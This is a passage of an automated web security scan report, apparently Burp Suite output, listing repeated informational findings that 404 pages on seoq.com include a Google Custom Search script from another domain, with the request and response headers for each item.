<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
24.60. http://www.seoq.com/wp-content/uploads/2008/07/washington-dc-web-page-designer.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /wp-content/uploads/2008/07/washington-dc-web-page-designer.jpg

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /wp-content/uploads/2008/07/washington-dc-web-page-designer.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com

Response

HTTP/1.1 404 Not Found
Date: Mon, 02 May 2011 02:43:16 GMT
Server: Apache
Set-Cookie: PHPSESSID=dler6f6f9e9el2gd44qef454c7; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://www.seoq.com/xmlrpc.php
Last-Modified: Mon, 02 May 2011 02:43:16 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 12842

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
24.61. http://www.seoq.com/wp-content/uploads/2008/07/wordpress-for-iphone.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /wp-content/uploads/2008/07/wordpress-for-iphone.jpg

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /wp-content/uploads/2008/07/wordpress-for-iphone.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com

Response

HTTP/1.1 404 Not Found
Date: Mon, 02 May 2011 02:43:16 GMT
Server: Apache
Set-Cookie: PHPSESSID=a90bq0ka7dbph6a2c3i6ra6757; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://www.seoq.com/xmlrpc.php
Last-Modified: Mon, 02 May 2011 02:43:17 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 12831

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
24.62. http://www.seoq.com/wp-content/uploads/2008/07/wordpress-users-guide.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /wp-content/uploads/2008/07/wordpress-users-guide.jpg

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /wp-content/uploads/2008/07/wordpress-users-guide.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com

Response

HTTP/1.1 404 Not Found
Date: Mon, 02 May 2011 02:43:19 GMT
Server: Apache
Set-Cookie: PHPSESSID=5uvpfm92vhm8sjc050353p2280; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://www.seoq.com/xmlrpc.php
Last-Modified: Mon, 02 May 2011 02:43:20 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 12832

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
24.63. http://www.seoq.com/wp-content/uploads/2008/08/before-en.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /wp-content/uploads/2008/08/before-en.jpg

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /wp-content/uploads/2008/08/before-en.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com

Response

HTTP/1.1 404 Not Found
Date: Mon, 02 May 2011 02:46:35 GMT
Server: Apache
Set-Cookie: PHPSESSID=e3tmqsse418t5e97gc66chvei2; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://www.seoq.com/xmlrpc.php
Last-Modified: Mon, 02 May 2011 02:46:36 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 12820

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
24.64. http://www.seoq.com/wp-content/uploads/2008/08/circuit-city-stock-price-crash.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /wp-content/uploads/2008/08/circuit-city-stock-price-crash.jpg

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /wp-content/uploads/2008/08/circuit-city-stock-price-crash.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com

Response

HTTP/1.1 404 Not Found
Date: Mon, 02 May 2011 02:45:58 GMT
Server: Apache
Set-Cookie: PHPSESSID=fgl2jovfcb50uf72m2fkieceq6; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://www.seoq.com/xmlrpc.php
Last-Modified: Mon, 02 May 2011 02:45:59 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 12841

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
24.65. http://www.seoq.com/wp-content/uploads/2008/08/target-stock-on-the-rise1.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /wp-content/uploads/2008/08/target-stock-on-the-rise1.jpg

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /wp-content/uploads/2008/08/target-stock-on-the-rise1.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com

Response

HTTP/1.1 404 Not Found
Date: Mon, 02 May 2011 02:46:25 GMT
Server: Apache
Set-Cookie: PHPSESSID=7uj7e9ldpg45knc7fkags98qi0; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://www.seoq.com/xmlrpc.php
Last-Modified: Mon, 02 May 2011 02:46:25 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 12836

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
24.66. http://www.seoq.com/wp-content/uploads/2008/08/target.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /wp-content/uploads/2008/08/target.jpg

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /wp-content/uploads/2008/08/target.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com

Response

HTTP/1.1 404 Not Found
Date: Mon, 02 May 2011 02:44:57 GMT
Server: Apache
Set-Cookie: PHPSESSID=mpoko4q3f16vbpjlk8pjk1d350; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://www.seoq.com/xmlrpc.php
Last-Modified: Mon, 02 May 2011 02:44:58 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 12817

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
24.67. http://www.seoq.com/wp-content/uploads/2008/09/biznik-professional-networking-site.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /wp-content/uploads/2008/09/biznik-professional-networking-site.jpg

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /wp-content/uploads/2008/09/biznik-professional-networking-site.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com

Response

HTTP/1.1 404 Not Found
Date: Mon, 02 May 2011 02:45:29 GMT
Server: Apache
Set-Cookie: PHPSESSID=pbhe1jtfilvbh1gnd13tgl5r87; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://www.seoq.com/xmlrpc.php
Last-Modified: Mon, 02 May 2011 02:45:29 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 12846

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
24.68. http://www.seoq.com/wp-content/uploads/2008/09/g1-google-iphone-by-t-mobile.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /wp-content/uploads/2008/09/g1-google-iphone-by-t-mobile.jpg

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /wp-content/uploads/2008/09/g1-google-iphone-by-t-mobile.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com

Response

HTTP/1.1 404 Not Found
Date: Mon, 02 May 2011 02:45:17 GMT
Server: Apache
Set-Cookie: PHPSESSID=q3oq59gdqk5qddjugp1t6q68v6; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://www.seoq.com/xmlrpc.php
Last-Modified: Mon, 02 May 2011 02:45:18 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 12839

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
24.69. http://www.seoq.com/wp-content/uploads/2008/09/search-statistics.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /wp-content/uploads/2008/09/search-statistics.jpg

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /wp-content/uploads/2008/09/search-statistics.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com

Response

HTTP/1.1 404 Not Found
Date: Mon, 02 May 2011 02:45:19 GMT
Server: Apache
Set-Cookie: PHPSESSID=g6ot4dlqueel2sdr2ham4iut67; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://www.seoq.com/xmlrpc.php
Last-Modified: Mon, 02 May 2011 02:45:20 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 12828

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
24.70. http://www.seoq.com/wp-content/uploads/2008/10/bilingual-english-spanish-web-designer-developer-andrea.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /wp-content/uploads/2008/10/bilingual-english-spanish-web-designer-developer-andrea.jpg

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /wp-content/uploads/2008/10/bilingual-english-spanish-web-designer-developer-andrea.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com

Response

HTTP/1.1 404 Not Found
Date: Mon, 02 May 2011 02:41:28 GMT
Server: Apache
Set-Cookie: PHPSESSID=lmg6fbb6836tkiuk0pjr3evdb1; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://www.seoq.com/xmlrpc.php
Last-Modified: Mon, 02 May 2011 02:41:28 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 12866

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
24.71. http://www.seoq.com/wp-content/uploads/2008/10/bilingual-english-spanish-web-designer-developer-margaret.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /wp-content/uploads/2008/10/bilingual-english-spanish-web-designer-developer-margaret.jpg

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /wp-content/uploads/2008/10/bilingual-english-spanish-web-designer-developer-margaret.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com

Response

HTTP/1.1 404 Not Found
Date: Mon, 02 May 2011 02:41:45 GMT
Server: Apache
Set-Cookie: PHPSESSID=795fl6vdjvfli5lse7vr7r06p0; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://www.seoq.com/xmlrpc.php
Last-Modified: Mon, 02 May 2011 02:41:46 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 12868

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
24.72. http://www.seoq.com/wp-content/uploads/2008/10/bilingual-english-spanish-web-designer-developer-tina.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /wp-content/uploads/2008/10/bilingual-english-spanish-web-designer-developer-tina.jpg

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /wp-content/uploads/2008/10/bilingual-english-spanish-web-designer-developer-tina.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com

Response

HTTP/1.1 404 Not Found
Date: Mon, 02 May 2011 02:12:24 GMT
Server: Apache
Set-Cookie: PHPSESSID=tr4ndjjlpd3e82sbn9f6m8d2r7; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://www.seoq.com/xmlrpc.php
Last-Modified: Mon, 02 May 2011 02:12:25 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 12864

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
24.73. http://www.seoq.com/wp-content/uploads/2008/10/e-trade-sucks-10-12-minutes-to-get-started.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /wp-content/uploads/2008/10/e-trade-sucks-10-12-minutes-to-get-started.jpg

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /wp-content/uploads/2008/10/e-trade-sucks-10-12-minutes-to-get-started.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com

Response

HTTP/1.1 404 Not Found
Date: Mon, 02 May 2011 02:45:36 GMT
Server: Apache
Set-Cookie: PHPSESSID=m02j41rctmjgo8tsvi3hbfo097; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://www.seoq.com/xmlrpc.php
Last-Modified: Mon, 02 May 2011 02:45:36 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 12853

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
24.74. http://www.seoq.com/wp-content/uploads/2008/10/e-trade-sucks-not-fast-and-easy.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /wp-content/uploads/2008/10/e-trade-sucks-not-fast-and-easy.jpg

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /wp-content/uploads/2008/10/e-trade-sucks-not-fast-and-easy.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com

Response

HTTP/1.1 404 Not Found
Date: Mon, 02 May 2011 02:46:13 GMT
Server: Apache
Set-Cookie: PHPSESSID=f1qmk0sk5uki5li2ehj6rqc7b0; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://www.seoq.com/xmlrpc.php
Last-Modified: Mon, 02 May 2011 02:46:14 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 12842

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
24.75. http://www.seoq.com/wp-content/uploads/2008/10/google-stock-rebound.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /wp-content/uploads/2008/10/google-stock-rebound.jpg

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /wp-content/uploads/2008/10/google-stock-rebound.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com

Response

HTTP/1.1 404 Not Found
Date: Mon, 02 May 2011 02:45:50 GMT
Server: Apache
Set-Cookie: PHPSESSID=ns0b5okivesekmg9ppqr13q891; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://www.seoq.com/xmlrpc.php
Last-Modified: Mon, 02 May 2011 02:45:51 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 12831

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
24.76. http://www.seoq.com/wp-content/uploads/2008/11/change-gov-president-obama-transition-team.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /wp-content/uploads/2008/11/change-gov-president-obama-transition-team.jpg

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /wp-content/uploads/2008/11/change-gov-president-obama-transition-team.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com

Response

HTTP/1.1 404 Not Found
Date: Mon, 02 May 2011 02:12:24 GMT
Server: Apache
Set-Cookie: PHPSESSID=vfiqd2ekptb8ecvbrq2rprvk87; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://www.seoq.com/xmlrpc.php
Last-Modified: Mon, 02 May 2011 02:12:25 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 12853

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
24.77. http://www.seoq.com/wp-content/uploads/2008/11/circuit-city-stock-price-cc.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /wp-content/uploads/2008/11/circuit-city-stock-price-cc.jpg

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /wp-content/uploads/2008/11/circuit-city-stock-price-cc.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com

Response

HTTP/1.1 404 Not Found
Date: Mon, 02 May 2011 02:12:24 GMT
Server: Apache
Set-Cookie: PHPSESSID=ep58rjkns66nvt4jbkb8qb8jd2; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://www.seoq.com/xmlrpc.php
Last-Modified: Mon, 02 May 2011 02:12:25 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 12838

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
24.78. http://www.seoq.com/wp-content/uploads/2008/12/iphone-starbucks-partnership.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /wp-content/uploads/2008/12/iphone-starbucks-partnership.gif

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /wp-content/uploads/2008/12/iphone-starbucks-partnership.gif HTTP/1.1
Accept: */*
